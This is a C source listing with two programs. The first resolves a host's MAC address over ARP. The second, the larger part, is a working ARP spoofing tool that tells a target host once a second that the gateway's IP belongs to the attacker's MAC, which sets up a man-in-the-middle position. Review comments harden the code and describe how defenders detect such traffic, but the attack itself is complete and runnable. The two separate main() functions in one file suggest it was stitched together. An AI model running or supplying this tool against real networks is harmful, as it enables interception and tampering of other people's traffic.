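/*
 * Resolve the MAC address of the IPv4 host given in z[1] by ARP and print it
 * as aa:bb:cc:dd:ee:ff.
 *
 * An ARP request for z[1] is built once and handed to a sender thread
 * (send_eth_packet); this thread then reads frames from a packet socket bound
 * to net_if until one carries ethertype 0x0806 with a sender-IP field equal
 * to z[1].
 *
 * packet_socket, net_if, sem_info and f are file-scope objects declared
 * outside this listing, as are errn1(), ok0(), rev2(), conv_ip(),
 * get_ifindex() and mk_arp_request_packet().
 * NOTE(review): errn1/ok0 presumably abort when the call returns -1 /
 * non-zero, and rev2 presumably byte-swaps a 16-bit value - confirm.
 *
 * ARP carries no authentication: any station on the segment can answer for
 * z[1], and the match below does not look at the ARP opcode, so a request
 * sent by that address matches too. Treat the printed MAC as a claim made by
 * the first matching frame, not as a verified binding.
 *
 * Returns 0 once a matching frame has been printed, 1 on a usage error.
 */
int main(int c, char *z[])
{
    /* Byte offsets inside an Ethernet frame carrying ARP over IPv4. */
    enum {
        ETHERTYPE_OFF = 12,   /* 16-bit ethertype */
        ARP_SHA_OFF   = 22,   /* sender hardware address, 6 bytes */
        ARP_SPA_OFF   = 28,   /* sender protocol address, 4 bytes */
        ARP_FRAME_MIN = 42    /* 14-byte Ethernet header + 28-byte ARP body */
    };

    /* z[1] is dereferenced several times below; refuse to run without it. */
    if (c < 2) {
        fprintf(stderr, "usage: %s <target_ip>\n", (c > 0 && z[0]) ? z[0] : "prog");
        return 1;
    }

    errn1(packet_socket = socket(AF_PACKET, SOCK_RAW, rev2(ETH_P_ALL)), "open socket error");

    /*
     * Zero both addresses first: bind() and the sender read every field of
     * struct sockaddr_ll, and the original left sll_hatype, sll_pkttype and
     * (for the bind address) sll_halen/sll_addr as stack garbage.
     */
    struct sockaddr_ll sa_ll_b, sa_ll_s;
    memset(&sa_ll_b, 0, sizeof sa_ll_b);
    memset(&sa_ll_s, 0, sizeof sa_ll_s);

    sa_ll_b.sll_family = AF_PACKET;
    sa_ll_b.sll_protocol = rev2(ETH_P_ALL);
    sa_ll_b.sll_ifindex = get_ifindex(packet_socket, net_if);

    sa_ll_s.sll_family = AF_PACKET;
    sa_ll_s.sll_halen = 0x06;
    sa_ll_s.sll_ifindex = get_ifindex(packet_socket, net_if);
    /* Raw bytes, not a C string: copy exactly six broadcast octets. */
    memcpy(sa_ll_s.sll_addr, "\xff\xff\xff\xff\xff\xff", 6);

    ok0(bind(packet_socket, (struct sockaddr*)&sa_ll_b, sizeof(struct sockaddr_ll)), "bind error");

    /*
     * msg holds the outgoing request and is owned by the sender thread from
     * here on. Received frames go into rx so that a frame arriving from the
     * network can never overwrite the packet the sender is about to transmit.
     * (send_eth_packet is not visible here; it is handed a pointer to msg.)
     */
    char msg[1500+14];
    char rx[sizeof msg];
    int len = mk_arp_request_packet(msg, "\xcc\xcc\xcc\xcc\xcc\xcc", conv_ip("1.1.1.1"), conv_ip(z[1]));

    semi a;
    a.socket = packet_socket;
    a.len = len;
    a.msg = msg;
    a.sa_ll = &sa_ll_s;

    pthread_t thread_info;
    ok0(sem_init(&sem_info, 0, 0), "sem_init error");
    ok0(pthread_create(&thread_info, NULL, send_eth_packet, (void*)&a), "pthread_create error");

    f = set_promiscuous(packet_socket, net_if);

    /* Give up after two seconds; what happens then is up to alarm_handler. */
    signal(SIGALRM, alarm_handler);
    alarm(2);

    while (1) {
        ok0(sem_post(&sem_info), "sem_post error");

        ssize_t got = recvfrom(packet_socket, rx, sizeof rx, 0, NULL, NULL);
        errn1(got, "recvfrom error");

        /* Frames from the wire are untrusted: never parse past what arrived. */
        if (got < ARP_FRAME_MIN)
            continue;

        /* memcpy instead of pointer casts: the fields are not aligned for int. */
        short ethertype;
        int sender_ip;
        memcpy(&ethertype, rx + ETHERTYPE_OFF, sizeof ethertype);
        memcpy(&sender_ip, rx + ARP_SPA_OFF, sizeof sender_ip);

        if (ethertype == rev2(0x0806) && sender_ip == conv_ip(z[1])) {
            int i;
            for (i = 0; i < 6; i++)
                printf("%.2x%c", rx[ARP_SHA_OFF + i] & 0xff, (i + 1 == 6) ? '\n' : ':');
            /* Only undo promiscuous mode if set_promiscuous reported a change. */
            if (f)
                leave_promiscuous(packet_socket, net_if);
            return 0;
        }
    }
}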
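/*
 * usage: <prog> <interface> <ip_target>
 *
 * Broadcasts one ARP request for <ip_target> on <interface>, reads a single
 * frame back, and, if that frame is an ARP reply whose sender IP is the
 * target, sends the target one ARP reply per second that pairs the GATEWAY
 * address with this interface's MAC. The loop ends only on a send error or
 * when the process is killed.
 *
 * set_promiscuous(), get_ifi(), MAC_LEN, IP_LEN, MAC_BCAST_ADDR and GATEWAY
 * are defined outside this listing.
 *
 * What this looks like to a defender: a steady one-per-second stream of
 * unsolicited ARP replies (opcode 2) addressed to one host, in which the
 * gateway's IP is bound to a MAC that is not the gateway's. Switch-side
 * Dynamic ARP Inspection with DHCP snooping drops such frames, a static ARP
 * entry for the gateway on the host ignores them, and any monitor that tracks
 * IP-to-MAC changes (arpwatch-style) reports the flip.
 *
 * Exit status: 0 when the single received frame was not a matching reply,
 * 1 on usage, privilege, address or I/O errors, 2 when the socket cannot be
 * opened.
 */
int main(int argc, char *argv[])
{
    /* Byte offsets inside an Ethernet frame carrying ARP over IPv4. */
    enum {
        ETHERTYPE_OFF = 12,   /* 16-bit ethertype */
        ARP_OP_OFF    = 20,   /* 16-bit ARP opcode */
        ARP_SHA_OFF   = 22,   /* sender hardware address */
        ARP_SPA_OFF   = 28,   /* sender protocol address */
        ARP_FRAME_MIN = 42    /* 14-byte Ethernet header + 28-byte ARP body */
    };

    if (argc != 3) {
        fprintf(stderr, "usage: %s <interface> <ip_target>\n", argv[0]);
        exit(1);   /* a usage error is a failure, not success */
    }

    /* Packet sockets need privileges; both real and effective uid must be 0. */
    if (geteuid() || getuid()) {
        printf("ERROR: You must be root to use this utility\n");
        exit(1);
    }

    /*
     * Validate the command-line address before touching the network.
     * inet_aton() returns 0 on malformed input; the original ignored that
     * and also wrote through a u_char[4] cast to struct in_addr *.
     */
    struct in_addr target_ip;
    if (!inet_aton(argv[2], &target_ip)) {
        fprintf(stderr, "invalid target address: %s\n", argv[2]);
        exit(1);
    }

    int sfd, len;
    u_char *mac;
    char recv_buf[60];
    struct in_addr ip_addr;
    struct sockaddr_ll sl;
    struct arp_pkt {
        struct ether_header eh;
        struct ether_arp ea;
        u_char padding[18];   /* pads the frame to the 60-byte Ethernet minimum */
    } arp;

    /* Open the raw packet socket. */
    if ((sfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
        perror("socket");
        exit(2);
    }

    /*
     * Put the interface into promiscuous mode.
     * NOTE(review): nothing in this function turns it back off on any exit
     * path - confirm whether set_promiscuous() arranges for that itself.
     */
    set_promiscuous(sfd, argv[1]);

    /* Look up this interface's own MAC and IPv4 address. */
    mac = malloc(MAC_LEN);
    if (mac == NULL) {
        perror("malloc");
        close(sfd);
        exit(1);
    }
    if (get_ifi(sfd, argv[1], mac, &ip_addr)) {
        free(mac);
        close(sfd);
        exit(1);
    }

    memset(&arp, 0, sizeof(arp));

    /* Fill in the Ethernet header. */
    memcpy(arp.eh.ether_dhost, MAC_BCAST_ADDR, MAC_LEN);
    memcpy(arp.eh.ether_shost, mac, MAC_LEN);
    arp.eh.ether_type = htons(ETHERTYPE_ARP);

    /* Fill in the ARP payload. */
    arp.ea.arp_hrd = htons(ARPHRD_ETHER);
    arp.ea.arp_pro = htons(ETHERTYPE_IP);
    arp.ea.arp_hln = MAC_LEN;
    arp.ea.arp_pln = IP_LEN;
    arp.ea.arp_op = htons(ARPOP_REQUEST);
    memcpy(arp.ea.arp_sha, mac, MAC_LEN);
    memcpy(arp.ea.arp_spa, &ip_addr, IP_LEN);
    memset(&arp.ea.arp_tha, 0, MAC_LEN);
    memcpy(arp.ea.arp_tpa, &target_ip, sizeof arp.ea.arp_tpa);
    memset(&arp.padding, 0, sizeof(arp.padding));

    /*
     * Zero the link-layer address before use: the original passed
     * sll_protocol, sll_halen and sll_addr to sendto() uninitialised.
     */
    memset(&sl, 0, sizeof(sl));
    sl.sll_family = PF_PACKET;
    sl.sll_ifindex = if_nametoindex(argv[1]);
    if (sl.sll_ifindex == 0) {
        perror("if_nametoindex");
        free(mac);
        close(sfd);
        exit(1);
    }

    if ((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0) {
        perror("sendto request");
        free(mac);
        close(sfd);
        exit(1);
    }
    printf("Broadcast arp request of %s, %d bytes be sent\n", argv[2], len);

    /*
     * Read exactly one frame. The bound is the buffer's own size rather than
     * sizeof(arp), which only happened to be the same 60 bytes.
     */
    memset(recv_buf, 0, sizeof(recv_buf));
    if ((len = recvfrom(sfd, recv_buf, sizeof(recv_buf), 0, NULL, NULL)) <= 0) {
        perror("recvfrom reply");
        free(mac);
        close(sfd);
        exit(1);
    }
    /* Printed before the frame is inspected; it may not be an ARP reply at all. */
    printf("Recv arp reply of %s, %d bytes be sent\n", argv[2], len);

    /*
     * The frame is untrusted input: require a complete ARP frame before
     * reading its fields, and copy the 16-bit fields out instead of casting
     * an unaligned char pointer.
     */
    unsigned short ethertype = 0;
    unsigned short opcode = 0;
    if (len >= ARP_FRAME_MIN) {
        memcpy(&ethertype, recv_buf + ETHERTYPE_OFF, sizeof ethertype);
        memcpy(&opcode, recv_buf + ARP_OP_OFF, sizeof opcode);
    }

    /* Proceed only for an ARP reply whose sender IP is argv[2]. */
    if (len >= ARP_FRAME_MIN
        && ntohs(ethertype) == ETHERTYPE_ARP
        && ntohs(opcode) == ARPOP_REPLY
        && !memcmp(arp.ea.arp_tpa, recv_buf + ARP_SPA_OFF, sizeof arp.ea.arp_tpa)) {

        struct in_addr gateway_ip;
        if (!inet_aton(GATEWAY, &gateway_ip)) {
            fprintf(stderr, "invalid gateway address: %s\n", GATEWAY);
            free(mac);
            close(sfd);
            exit(1);
        }

        /* Re-address the frame to the replying host and turn it into a reply. */
        memcpy(arp.eh.ether_dhost, recv_buf + ARP_SHA_OFF, MAC_LEN);
        arp.ea.arp_op = htons(ARPOP_REPLY);
        memcpy(arp.ea.arp_spa, &gateway_ip, sizeof arp.ea.arp_spa);
        memcpy(arp.ea.arp_tha, recv_buf + ARP_SHA_OFF, MAC_LEN);

        /* One frame per second until a send fails or the process is killed. */
        while (1) {
            if ((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0) {
                perror("sendto request");
                free(mac);
                close(sfd);
                exit(1);
            }
            printf("Send arp spoofing to %s, %d bytes be sent\n", argv[2], len);
            sleep(1);
        }
    }

    free(mac);
    close(sfd);
    return 0;
}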